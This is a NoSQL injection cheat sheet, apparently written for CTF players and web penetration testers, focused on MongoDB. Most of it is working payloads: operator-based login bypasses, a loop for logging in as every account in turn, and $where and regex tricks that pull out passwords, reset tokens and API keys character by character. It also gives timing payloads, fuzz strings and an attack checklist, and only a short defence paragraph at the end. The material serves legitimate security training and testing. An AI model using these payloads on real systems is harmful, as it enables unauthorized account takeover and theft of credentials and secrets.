NoSQL Injection

Cheatsheet for CTFs & web pentests. Based on PortSwigger Web Security Academy. Most examples target MongoDB (most common in the wild).

Two flavors:

• Syntax injection — break the query string (like classic SQLi but JS/JSON-flavoured).
• Operator injection — inject Mongo operators ($ne, $regex, $where, …) as nested JSON / bracketed params.

See also SQL Injection, Authentication (auth-bypass payloads), API Security.

Where to look

• Login forms with JSON body ({"username":"x","password":"y"})
• Anything with structured filters: search, category, sort, pagination, “advanced search”
• GraphQL backends sitting on Mongo
• Internal admin endpoints — often use $where with raw JS
• Password reset / forgot-password flows (token field hidden in user doc)

Detection

Fuzz string (URL / param):

'"`{
;$Foo}
$Foo \xYZ

JSON-encoded variant:

'\"`{\r;$Foo}\n$Foo \\xYZ

Single-character probes:

Boolean confirmation (string ctx):

fizzy' && 0 && 'x      → false  (no/empty results)
fizzy' && 1 && 'x      → true   (results back)
fizzy'||1||'           → always true (dump everything, incl. unreleased)
fizzy'%00              → truncate, ignore further conditions

Operator injection (the bread & butter)

JSON body — turn a string into an operator object:

{"username":{"$ne":"x"},"password":{"$ne":"x"}}      # auth bypass: first user
{"username":{"$regex":"^admin"},"password":{"$ne":""}}   # target admin
{"username":{"$in":["admin","administrator","root"]},"password":{"$ne":""}}
{"username":{"$gt":""},"password":{"$gt":""}}        # alt to $ne
{"username":"admin","password":{"$regex":"^a"}}      # exfil char-by-char

URL-param form (when body isn’t JSON):

username[$ne]=x&password[$ne]=x
username[$regex]=^admin&password[$ne]=

If URL form fails: switch to POST + Content-Type: application/json and inject in body. Burp’s Content Type Converter extension automates it.

Useful operators: $ne $gt $lt $in $nin $exists $regex $where $or $and $not $expr $type $mod.

Auth bypass shortcuts

Try in order:

1. {"username":"admin","password":{"$ne":"x"}}
2. {"username":{"$ne":"x"},"password":{"$ne":"x"}} — logs in as first doc, often root
3. {"username":{"$regex":"^adm"},"password":{"$ne":""}}
4. {"username":{"$in":["admin","administrator","superadmin","root"]},"password":{"$ne":""}}
5. URL-encoded: username[$ne]=x&password[$ne]=x

$ne only logs you in as the first doc. To walk through every account, exclude the ones you’ve already landed on with $nin and keep growing the list:

{"username":{"$nin":["admin"]},"password":{"$ne":"x"}}            # next user after admin
{"username":{"$nin":["admin","jude"]},"password":{"$ne":"x"}}     # skip both, get the next

Repeat until you’ve hit every account. Cleaner than guessing names with $in.

Exfiltration via $where (server-side JS)

If the app uses $where, you get arbitrary JS in the query context — this is the current document.

Length:

admin' && this.password.length == 8 || 'a'=='b
admin' && this.password.length < 30 || 'a'=='b   # binary-search the length

Char-by-char:

admin' && this.password[0] == 'a' || 'a'=='b
admin' && this.password.match(/^a/) || 'a'=='b
admin' && this.password.match(/\d/) || 'a'=='b   # contains digit?

Burp Intruder cluster bomb: position 1 = index 0..len-1, position 2 = a-z0-9. Sort by Length to spot true hits.

Field-name discovery

You don’t know the schema — Mongo is schemaless. Discover fields:

Via $where + Object.keys(this):

"$where":"Object.keys(this)[0].match('^.{0}a.*')"   # 1st char of 1st field is 'a'?
"$where":"Object.keys(this)[1].match('^.{§§}§§.*')"  # 2nd field, char by char

Increment the array index to walk all fields. Look for things like passwordResetToken, apiKey, mfaSecret, email.

Or by guessing: admin' && this.password != ' (compare response to a known-good field like username and a junk field like foo).

Operator-based exfil (no $where available)

{"username":"admin","password":{"$regex":"^a.*"}}
{"username":"admin","password":{"$regex":"^ab.*"}}
{"username":"admin","password":{"$regex":"^abc.*"}}

Bisect with character classes: ^[a-m], then ^[a-f], etc. — log2(charset) requests per char.

Useful regex tricks:

^a.*           starts with a
.*z$           ends with z
^a{5}$         exact length 5
[A-Z]          contains uppercase

Inject $where even when not present

Add it as an extra JSON key — Mongo applies all top-level keys as conditions:

{"username":"carlos","password":{"$ne":"x"},"$where":"0"}   # → no match
{"username":"carlos","password":{"$ne":"x"},"$where":"1"}   # → match

Different responses ⇒ $where JS is being evaluated → escalate to data extraction.

Timing-based (when responses don’t differ)

admin'+function(x){var t=new Date(new Date().getTime()+5000);while((x.password[0]==='a')&&t>new Date()){};}(this)+'
admin'+function(x){if(x.password[0]==='a'){sleep(5000)};}(this)+'
{"$where":"sleep(5000)"}
{"$where":"if(this.password[0]=='a'){sleep(3000)}"}

Baseline the normal latency 5–10× first.

Other NoSQL DBs (quick hits)

• CouchDB — JSON HTTP API; injection often via _find selectors with $gt, $regex. Default :5984/_all_dbs admin if exposed.
• Redis — usually accessed by SSRF/gopher, not “injection”. See SSRF.
• Cassandra (CQL) — looks SQL-ish; same '/-- tricks but no joins.
• Elasticsearch — JSON DSL; script queries (Painless) → RCE if scripting enabled. Watch for query_string reflective injection.
• DynamoDB / Firebase — usually no string concat → operator-injection style only via SDK misuse.

Tools

• Burp Repeater + Intruder (cluster bomb for char extraction)
• NoSQLMap — automated detection + auth bypass + extraction
• mongoaudit — config / auth review
• seclists/Fuzzing/Databases/NoSQL.txt
• Burp Content Type Converter ext — flip URL → JSON

CTF / pentest checklist

• Identify content type: form / JSON / GraphQL — try operator injection in all forms
• Login: {"$ne":""} on user & pass — instant bypass on cheap apps
• Login: {"$regex":"^admin"} to target the admin doc
• URL form: username[$ne]=x&password[$ne]=x — works when GET with bracket parsing
• Try the fuzz string '\"`{\r;$Foo}\n$Foo \\xYZ — look for stacktraces / 500s
• Confirm boolean control: ' && 1 && ' vs ' && 0 && '
• Try null-byte truncation %00 to drop trailing released==1 style filters
• If $where accepted → JS exfil (length, then char-by-char with Intruder cluster bomb)
• If only operators → $regex char-by-char (binary search with [a-m]/[a-f])
• Add "$where":"1" / "0" as extra JSON key to test for evaluation
• Discover hidden fields with Object.keys(this)[i].match(...) — hunt passwordResetToken, apiKey, mfaSecret
• Use discovered fields against other endpoints (e.g. GET /forgot-password?<token-field>=x)
• No diff in responses → timing payloads (sleep(5000))
• Watch for accidental destructive injection — ||1|| in update/delete contexts wipes data
• Crack any extracted hash offline (see Authentication)

Defence (one-liner)

Validate types server-side (typeof password === 'string') — most Mongo-driver operator injections die here. Allowlist input keys, never spread user JSON straight into a query (db.users.findOne({...req.body}) is the classic sin). Avoid $where and mapReduce with user input. Parameterize via the driver’s typed query builders.